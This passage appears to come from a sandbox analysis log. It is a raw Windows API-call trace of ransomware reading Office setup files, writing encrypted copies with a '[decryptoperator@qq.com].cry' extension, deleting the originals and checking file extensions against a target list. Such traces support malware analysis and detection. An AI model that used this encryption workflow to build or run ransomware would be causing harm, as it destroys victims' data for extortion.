| out: lpNewFilePointer=0x0) returned 1 [0040.226] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0040.226] GetLastError () returned 0x0 [0040.226] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x15b5, lpOverlapped=0x0) returned 1 [0040.237] WriteFile (in: hFile=0x1c0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x15c0, lpOverlapped=0x0) returned 1 [0040.238] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.238] WriteFile (in: hFile=0x1c0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xee, lpOverlapped=0x0) returned 1 [0040.238] SetEndOfFile (hFile=0x1c0) returned 1 [0040.238] CloseHandle (hObject=0x1c0) returned 1 [0040.239] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.239] SetEndOfFile (hFile=0x1bc) returned 1 [0040.240] CloseHandle (hObject=0x1bc) returned 1 [0040.240] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.240] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml")) returned 1 [0040.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.240] lstrlenW (lpString=".doc") returned 4 [0040.240] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.240] lstrlenW (lpString=".docx") returned 5 [0040.241] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.241] lstrlenW (lpString=".pdf") returned 4 [0040.241] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.241] lstrlenW (lpString=".xls") returned 4 [0040.241] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.241] lstrlenW (lpString=".xlsx") returned 5 [0040.241] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.241] lstrlenW (lpString=".ppt") returned 4 [0040.241] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.241] lstrlenW (lpString=".zip") returned 4 [0040.241] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.241] lstrlenW (lpString=".rar") returned 4 [0040.241] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.241] lstrlenW (lpString=".bz2") returned 4 [0040.241] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.241] lstrlenW (lpString=".7z") returned 3 [0040.241] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.241] lstrlenW (lpString=".dbf") returned 4 [0040.241] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.241] lstrlenW (lpString=".1cd") returned 4 [0040.241] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.241] lstrlenW (lpString=".jpg") returned 4 [0040.241] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.241] lstrlenW (lpString=".doc") returned 4 [0040.241] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.241] lstrlenW (lpString=".docx") returned 5 [0040.241] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.241] lstrlenW (lpString=".pdf") returned 4 [0040.241] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.241] lstrlenW (lpString=".xls") returned 4 [0040.241] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.242] lstrlenW (lpString=".xlsx") returned 5 [0040.242] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.242] lstrlenW (lpString=".ppt") returned 4 [0040.242] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.242] lstrlenW (lpString=".zip") returned 4 [0040.242] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.242] lstrlenW (lpString=".rar") returned 4 [0040.242] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.242] lstrlenW (lpString=".bz2") returned 4 [0040.242] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.242] lstrlenW (lpString=".7z") returned 3 [0040.242] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.242] lstrlenW (lpString=".dbf") returned 4 [0040.242] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.242] lstrlenW (lpString=".1cd") returned 4 [0040.242] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106 [0040.242] lstrlenW (lpString=".jpg") returned 4 [0040.242] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.242] lstrcmpiW (lpString1=".CHM", lpString2=".cry") returned -1 [0040.243] lstrlenW (lpString="PSCONFIG.CHM") returned 12 [0040.243] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.252] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=37689) returned 1 [0040.252] CloseHandle (hObject=0x1bc) returned 1 [0040.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm")) returned 0x20 [0040.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.252] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.252] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0040.253] GetLastError () returned 0x0 [0040.253] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x9339, lpOverlapped=0x0) returned 1 [0040.266] WriteFile (in: hFile=0x1c0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x9340, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x9340, lpOverlapped=0x0) returned 1 [0040.267] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.267] WriteFile (in: hFile=0x1c0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.267] SetEndOfFile (hFile=0x1c0) returned 1 [0040.267] CloseHandle (hObject=0x1c0) returned 1 [0040.268] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.268] SetEndOfFile (hFile=0x1bc) returned 1 [0040.269] CloseHandle (hObject=0x1bc) returned 1 [0040.269] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.269] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm")) returned 1 [0040.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.269] lstrlenW (lpString=".doc") returned 4 [0040.269] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.269] lstrlenW (lpString=".docx") returned 5 [0040.269] lstrcmpiW (lpString1=".docx", lpString2="G.CHM") returned -1 [0040.269] lstrlenW (lpString=".pdf") returned 4 [0040.269] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.269] lstrlenW (lpString=".xls") returned 4 [0040.269] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.269] lstrlenW (lpString=".xlsx") returned 5 [0040.269] lstrcmpiW (lpString1=".xlsx", lpString2="G.CHM") returned -1 [0040.269] lstrlenW (lpString=".ppt") returned 4 [0040.269] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.269] lstrlenW (lpString=".zip") returned 4 [0040.269] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.270] lstrlenW (lpString=".rar") returned 4 [0040.270] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.270] lstrlenW (lpString=".bz2") returned 4 [0040.270] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.270] lstrlenW (lpString=".7z") returned 3 [0040.270] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.270] lstrlenW (lpString=".dbf") returned 4 [0040.270] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.270] lstrlenW (lpString=".1cd") returned 4 [0040.270] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.270] lstrlenW (lpString=".jpg") returned 4 [0040.270] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.270] lstrlenW (lpString=".doc") returned 4 [0040.270] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.270] lstrlenW (lpString=".docx") returned 5 [0040.270] lstrcmpiW (lpString1=".docx", lpString2="G.CHM") returned -1 [0040.270] lstrlenW (lpString=".pdf") returned 4 [0040.270] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.270] lstrlenW (lpString=".xls") returned 4 [0040.270] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.270] lstrlenW (lpString=".xlsx") returned 5 [0040.270] lstrcmpiW (lpString1=".xlsx", lpString2="G.CHM") returned -1 [0040.270] lstrlenW (lpString=".ppt") returned 4 [0040.270] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.270] lstrlenW (lpString=".zip") returned 4 [0040.270] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.270] lstrlenW (lpString=".rar") returned 4 [0040.270] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.270] lstrlenW (lpString=".bz2") returned 4 [0040.270] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.270] lstrlenW (lpString=".7z") returned 3 [0040.270] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.271] lstrlenW (lpString=".dbf") returned 4 [0040.271] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.271] lstrlenW (lpString=".1cd") returned 4 [0040.271] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.271] lstrlenW (lpString=".jpg") returned 4 [0040.271] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.271] lstrcmpiW (lpString1=".CHM", lpString2=".cry") returned -1 [0040.271] lstrlenW (lpString="SETUP.CHM") returned 9 [0040.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.284] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=67190) returned 1 [0040.284] CloseHandle (hObject=0x1bc) returned 1 [0040.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm")) returned 0x20 [0040.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.284] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.284] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.284] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.284] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0040.285] GetLastError () returned 0x0 [0040.285] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x10676, lpOverlapped=0x0) returned 1 [0040.302] WriteFile (in: hFile=0x1c0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x10680, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x10680, lpOverlapped=0x0) returned 1 [0040.326] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.327] WriteFile (in: hFile=0x1c0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.380] SetEndOfFile (hFile=0x1c0) returned 1 [0040.380] CloseHandle (hObject=0x1c0) returned 1 [0040.382] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.382] SetEndOfFile (hFile=0x1bc) returned 1 [0040.383] CloseHandle (hObject=0x1bc) returned 1 [0040.383] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.383] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm")) returned 1 [0040.383] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.383] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.383] lstrlenW (lpString=".doc") returned 4 [0040.383] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.383] lstrlenW (lpString=".docx") returned 5 [0040.383] lstrcmpiW (lpString1=".docx", lpString2="P.CHM") returned -1 [0040.383] lstrlenW (lpString=".pdf") returned 4 [0040.383] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.383] lstrlenW (lpString=".xls") returned 4 [0040.383] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.383] lstrlenW (lpString=".xlsx") returned 5 [0040.383] lstrcmpiW (lpString1=".xlsx", lpString2="P.CHM") returned -1 [0040.383] lstrlenW (lpString=".ppt") returned 4 [0040.383] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.384] lstrlenW (lpString=".zip") returned 4 [0040.384] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.384] lstrlenW (lpString=".rar") returned 4 [0040.384] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.384] lstrlenW (lpString=".bz2") returned 4 [0040.384] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.384] lstrlenW (lpString=".7z") returned 3 [0040.384] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.384] lstrlenW (lpString=".dbf") returned 4 [0040.384] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.384] lstrlenW (lpString=".1cd") returned 4 [0040.384] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.384] lstrlenW (lpString=".jpg") returned 4 [0040.384] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.384] lstrlenW (lpString=".doc") returned 4 [0040.384] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.384] lstrlenW (lpString=".docx") returned 5 [0040.384] lstrcmpiW (lpString1=".docx", lpString2="P.CHM") returned -1 [0040.384] lstrlenW (lpString=".pdf") returned 4 [0040.384] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.384] lstrlenW (lpString=".xls") returned 4 [0040.384] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.384] lstrlenW (lpString=".xlsx") returned 5 [0040.384] lstrcmpiW (lpString1=".xlsx", lpString2="P.CHM") returned -1 [0040.384] lstrlenW (lpString=".ppt") returned 4 [0040.384] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.384] lstrlenW (lpString=".zip") returned 4 [0040.384] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.385] lstrlenW (lpString=".rar") returned 4 [0040.385] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.385] lstrlenW (lpString=".bz2") returned 4 [0040.385] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.385] lstrlenW (lpString=".7z") returned 3 [0040.385] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.385] lstrlenW (lpString=".dbf") returned 4 [0040.385] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.385] lstrlenW (lpString=".1cd") returned 4 [0040.385] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0040.385] lstrlenW (lpString=".jpg") returned 4 [0040.385] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.385] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.385] lstrlenW (lpString="OutlookMUI.XML") returned 14 [0040.385] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), 